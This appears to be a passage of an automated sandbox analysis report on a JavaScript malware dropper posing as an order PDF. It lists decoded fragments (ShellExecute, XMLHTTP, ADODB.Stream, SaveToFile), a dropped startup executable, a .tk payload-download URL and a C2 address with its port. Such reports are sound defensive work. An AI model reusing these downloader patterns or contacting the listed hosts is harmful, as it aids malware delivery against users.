'Send,Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5t']	Go to definition
Source: Order Specifications PDF.js	Return value : ['toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsSoAc0BdH0GfCq,279BGVghm,WQLhE3xcL', 'Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,A', '"Shell.Application"', 'DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTm', 'ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsSoAc0BdH0GfCq,279BGV', 'uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsS', '"Scripting.FileSystemObject","RY1%"', '"Scripting.FileSystemObject"', 'dXnloCodW7pcV8k0,uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt', '"SaveToFile"', '"Scripting.FileSystemObject","m*X5"', '"ADODB.Stream"', 'Send,Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5t']	Go to definition
Source: Order Specifications PDF.js	Return value : ['toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsSoAc0BdH0GfCq,279BGVghm,WQLhE3xcL', 'Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,A', '"Shell.Application"', 'DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTm', 'ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsSoAc0BdH0GfCq,279BGV', 'uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsS', '"Scripting.FileSystemObject","RY1%"', '"Scripting.FileSystemObject"', 'dXnloCodW7pcV8k0,uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt', '"SaveToFile"', '"Scripting.FileSystemObject","m*X5"', '"ADODB.Stream"', 'Send,Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5t']	Go to definition
Source: Order Specifications PDF.js	Return value : ['toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsSoAc0BdH0GfCq,279BGVghm,WQLhE3xcL', 'Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,A', '"Shell.Application"', 'DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTm', 'ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsSoAc0BdH0GfCq,279BGV', 'uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsS', '"Scripting.FileSystemObject","RY1%"', '"Scripting.FileSystemObject"', 'dXnloCodW7pcV8k0,uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt', '"SaveToFile"', '"Scripting.FileSystemObject","m*X5"', '"ADODB.Stream"', 'Send,Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5t']	Go to definition
Source: Order Specifications PDF.js	Argument value : ['toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsSoAc0BdH0GfCq,279BGVghm,WQLhE3xcL', 'Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,A', '"Shell.Application"', 'DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTm', 'ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsSoAc0BdH0GfCq,279BGV', 'uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsS', '"Scripting.FileSystemObject","RY1%"', '"Scripting.FileSystemObject"', 'dXnloCodW7pcV8k0,uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt', '"SaveToFile"', '"Scripting.FileSystemObject","m*X5"', '"ADODB.Stream"', 'Send,Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5t']	Go to definition
Source: Order Specifications PDF.js	Return value : ['toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsSoAc0BdH0GfCq,279BGVghm,WQLhE3xcL', 'Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,A', '"Shell.Application"', '428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTmowW6WowIz1WO5WW4O,W4yuy1BdPSoFWOOIgCo6qge,SaveToFile,WQ3cNSkvB', 'ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTmowW6WowIz1W', 'DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTm', 'uqtdR8kPceWHW5tdNW,AJ3cTmowW6WowIz1WO5WW4O,W4yuy1BdPSoFWOOIgCo6qge,SaveToFile,WQ3cNSkvBW,W4BcISoRW5q', 'ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsSoAc0BdH0GfCq,279BGV', 'uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsS', '"Scripting.FileSystemObject","RY1%"', '"Scripting.FileSystemObject"', 'dXnloCodW7pcV8k0,uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt', '"SaveToFile"', '"Scripting.FileSystemObject","m*X5"', '"ADODB.Stream"', 'Send,Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5t']	Go to definition
Source: Order Specifications PDF.js	Argument value : ['toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsSoAc0BdH0GfCq,279BGVghm,WQLhE3xcL', 'Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,A', '"Shell.Application"', '428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTmowW6WowIz1WO5WW4O,W4yuy1BdPSoFWOOIgCo6qge,SaveToFile,WQ3cNSkvB', 'ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTmowW6WowIz1W', 'DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTm', 'uqtdR8kPceWHW5tdNW,AJ3cTmowW6WowIz1WO5WW4O,W4yuy1BdPSoFWOOIgCo6qge,SaveToFile,WQ3cNSkvBW,W4BcISoRW5q', 'ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsSoAc0BdH0GfCq,279BGV', 'uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsS', '"Scripting.FileSystemObject","RY1%"', '"Scripting.FileSystemObject"', 'dXnloCodW7pcV8k0,uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt', '"SaveToFile"', '"Scripting.FileSystemObject","m*X5"', '"ADODB.Stream"', 'Send,Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5t']	Go to definition
Source: Order Specifications PDF.js	Return value : ['toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsSoAc0BdH0GfCq,279BGVghm,WQLhE3xcL', 'Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,A', '"Shell.Application"', '428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTmowW6WowIz1WO5WW4O,W4yuy1BdPSoFWOOIgCo6qge,SaveToFile,WQ3cNSkvB', 'ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTmowW6WowIz1W', 'DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTm', 'uqtdR8kPceWHW5tdNW,AJ3cTmowW6WowIz1WO5WW4O,W4yuy1BdPSoFWOOIgCo6qge,SaveToFile,WQ3cNSkvBW,W4BcISoRW5q', 'ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsSoAc0BdH0GfCq,279BGV', 'uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsS', '"Scripting.FileSystemObject","RY1%"', '"Scripting.FileSystemObject"', 'dXnloCodW7pcV8k0,uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt', '"SaveToFile"', '"Scripting.FileSystemObject","m*X5"', '"ADODB.Stream"', 'Send,Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5t']	Go to definition
Source: Order Specifications PDF.js	Return value : ['toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsSoAc0BdH0GfCq,279BGVghm,WQLhE3xcL', 'Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,A', '"Shell.Application"', '428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTmowW6WowIz1WO5WW4O,W4yuy1BdPSoFWOOIgCo6qge,SaveToFile,WQ3cNSkvB', 'ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTmowW6WowIz1W', 'DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTm', 'uqtdR8kPceWHW5tdNW,AJ3cTmowW6WowIz1WO5WW4O,W4yuy1BdPSoFWOOIgCo6qge,SaveToFile,WQ3cNSkvBW,W4BcISoRW5q', 'ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsSoAc0BdH0GfCq,279BGV', 'uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsS', '"Scripting.FileSystemObject","RY1%"', '"Scripting.FileSystemObject"', 'dXnloCodW7pcV8k0,uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt', '"SaveToFile"', '"Scripting.FileSystemObject","m*X5"', '"ADODB.Stream"', 'Shell.Application,463900CaNtRp,W4BcLCo0oJRcS8kdW4SaWO1/WQaN,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,W5xdQmkr', 'Send,Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5t']	Go to definition
Source: Order Specifications PDF.js	Return value : ['toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsSoAc0BdH0GfCq,279BGVghm,WQLhE3xcL', 'Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,A', '"Shell.Application"', '428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTmowW6WowIz1WO5WW4O,W4yuy1BdPSoFWOOIgCo6qge,SaveToFile,WQ3cNSkvB', 'ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTmowW6WowIz1W', 'DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTm', 'uqtdR8kPceWHW5tdNW,AJ3cTmowW6WowIz1WO5WW4O,W4yuy1BdPSoFWOOIgCo6qge,SaveToFile,WQ3cNSkvBW,W4BcISoRW5q', 'ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsSoAc0BdH0GfCq,279BGV', 'uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsS', '"Scripting.FileSystemObject","RY1%"', '"Scripting.FileSystemObject"', 'dXnloCodW7pcV8k0,uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt', '"SaveToFile"', '"Scripting.FileSystemObject","m*X5"', '"ADODB.Stream"', 'Shell.Application,463900CaNtRp,W4BcLCo0oJRcS8kdW4SaWO1/WQaN,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,W5xdQmkr', 'Send,Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5t']	Go to definition
Source: Order Specifications PDF.js	Return value : ['toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsSoAc0BdH0GfCq,279BGVghm,WQLhE3xcL', 'Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,A', '"Shell.Application"', '428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTmowW6WowIz1WO5WW4O,W4yuy1BdPSoFWOOIgCo6qge,SaveToFile,WQ3cNSkvB', 'ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTmowW6WowIz1W', 'DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTm', 'uqtdR8kPceWHW5tdNW,AJ3cTmowW6WowIz1WO5WW4O,W4yuy1BdPSoFWOOIgCo6qge,SaveToFile,WQ3cNSkvBW,W4BcISoRW5q', 'ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsSoAc0BdH0GfCq,279BGV', 'uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsS', '"Scripting.FileSystemObject","RY1%"', '"Scripting.FileSystemObject"', 'dXnloCodW7pcV8k0,uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt', '"SaveToFile"', '"Scripting.FileSystemObject","m*X5"', '"ADODB.Stream"', 'Shell.Application,463900CaNtRp,W4BcLCo0oJRcS8kdW4SaWO1/WQaN,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,W5xdQmkr', 'Send,Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5t']	Go to definition
Source: Order Specifications PDF.js	Return value : ['toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsSoAc0BdH0GfCq,279BGVghm,WQLhE3xcL', 'Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,A', '"Shell.Application"', '428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTmowW6WowIz1WO5WW4O,W4yuy1BdPSoFWOOIgCo6qge,SaveToFile,WQ3cNSkvB', 'ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTmowW6WowIz1W', 'DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTm', 'uqtdR8kPceWHW5tdNW,AJ3cTmowW6WowIz1WO5WW4O,W4yuy1BdPSoFWOOIgCo6qge,SaveToFile,WQ3cNSkvBW,W4BcISoRW5q', 'ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsSoAc0BdH0GfCq,279BGV', 'uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsS', '"Scripting.FileSystemObject","RY1%"', '"Scripting.FileSystemObject"', 'dXnloCodW7pcV8k0,uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt', '"SaveToFile"', '"Scripting.FileSystemObject","m*X5"', '"ADODB.Stream"', 'Shell.Application,463900CaNtRp,W4BcLCo0oJRcS8kdW4SaWO1/WQaN,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,W5xdQmkr', 'Send,Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5t']	Go to definition

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h	17_2_00EE2304
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h	17_2_00EE27F7
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h	17_2_00EE2BC4
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h	17_2_00EE0CF0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h	17_2_00EE0CCC
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h	17_2_00EE0D08

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System32\wscript.exe	Network Connect: 50.115.174.192 443			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Domain query: tgc8x.tk

Snort IDS alert for network traffic

Source: Traffic

Snort IDS: 2012811 ET DNS Query to a .tk domain - Likely Hostile 192.168.2.6:58595 -> 8.8.8.8:53

JavaScript source code contains functionality to generate code involving HTTP requests or file downloads

Source: Order Specifications PDF.js	Return value : ['uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsS', 'dXnloCodW7pcV8k0,uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt']	Go to definition
Source: Order Specifications PDF.js	Return value : ['Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,A', 'DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTm', 'Send,Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5t']	Go to definition
Source: Order Specifications PDF.js	Return value : ['dXnloCodW7pcV8k0,uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt']	Go to definition
Source: Order Specifications PDF.js	Return value : ['dXnloCodW7pcV8k0,uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt']	Go to definition
Source: Order Specifications PDF.js	Return value : ['Send,Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5t']	Go to definition
Source: Order Specifications PDF.js	Return value : ['toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsSoAc0BdH0GfCq,279BGVghm,WQLhE3xcL', 'ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsSoAc0BdH0GfCq,279BGV', 'uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsS', 'dXnloCodW7pcV8k0,uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt']	Go to definition
Source: Order Specifications PDF.js	Return value : ['"MSXML2.XMLHTTP"', '"Send"']	Go to definition
Source: Order Specifications PDF.js	Return value : ['ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsSoAc0BdH0GfCq,279BGV', 'uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsS', 'dXnloCodW7pcV8k0,uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt']	Go to definition
Source: Order Specifications PDF.js	Return value : ['"MSXML2.XMLHTTP"']	Go to definition
Source: Order Specifications PDF.js	Return value : ['"Send"']	Go to definition
Source: Order Specifications PDF.js	Return value : ['Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,A', '428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTmowW6WowIz1WO5WW4O,W4yuy1BdPSoFWOOIgCo6qge,SaveToFile,WQ3cNSkvB', 'ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTmowW6WowIz1W', 'DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTm', 'uqtdR8kPceWHW5tdNW,AJ3cTmowW6WowIz1WO5WW4O,W4yuy1BdPSoFWOOIgCo6qge,SaveToFile,WQ3cNSkvBW,W4BcISoRW5q', 'Send,Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5t']	Go to definition
Source: Order Specifications PDF.js	Return value : ['"MSXML2.XMLHTTP"']	Go to definition
Source: Order Specifications PDF.js	Return value : ['Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,A', 'Shell.Application,463900CaNtRp,W4BcLCo0oJRcS8kdW4SaWO1/WQaN,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,W5xdQmkr']	Go to definition
Source: Order Specifications PDF.js	Return value : ['Send,Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5t']	Go to definition
Source: Order Specifications PDF.js	Return value : ['dXnloCodW7pcV8k0,uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt']	Go to definition
Source: Order Specifications PDF.js	Return value : ['"MSXML2.XMLHTTP"']	Go to definition

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: 51.75.209.245

Source: Joe Sandbox View

ASN Name: VIRPUS VIRPUS

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: Joe Sandbox View	IP Address: 50.115.174.192 50.115.174.192
Source: Joe Sandbox View	IP Address: 51.75.209.245 51.75.209.245

Source: global traffic

HTTP traffic detected: GET /tt/VNZVNCXKKJSF.exe HTTP/1.1Accept: */*Accept-Language: en-usUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: tgc8x.tkConnection: Keep-Alive

Source: global traffic

TCP traffic: 192.168.2.6:49711 -> 51.75.209.245:2404

Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710

Source: unknown	TCP traffic detected without corresponding DNS query: 51.75.209.245
Source: unknown	TCP traffic detected without corresponding DNS query: 51.75.209.245
Source: unknown	TCP traffic detected without corresponding DNS query: 51.75.209.245
Source: unknown	TCP traffic detected without corresponding DNS query: 51.75.209.245
Source: unknown	TCP traffic detected without corresponding DNS query: 51.75.209.245
Source: unknown	TCP traffic detected without corresponding DNS query: 51.75.209.245
Source: unknown	TCP traffic detected without corresponding DNS query: 51.75.209.245
Source: unknown	TCP traffic detected without corresponding DNS query: 51.75.209.245
Source: unknown	TCP traffic detected without corresponding DNS query: 51.75.209.245
Source: unknown	TCP traffic detected without corresponding DNS query: 51.75.209.245
Source: unknown	TCP traffic detected without corresponding DNS query: 51.75.209.245
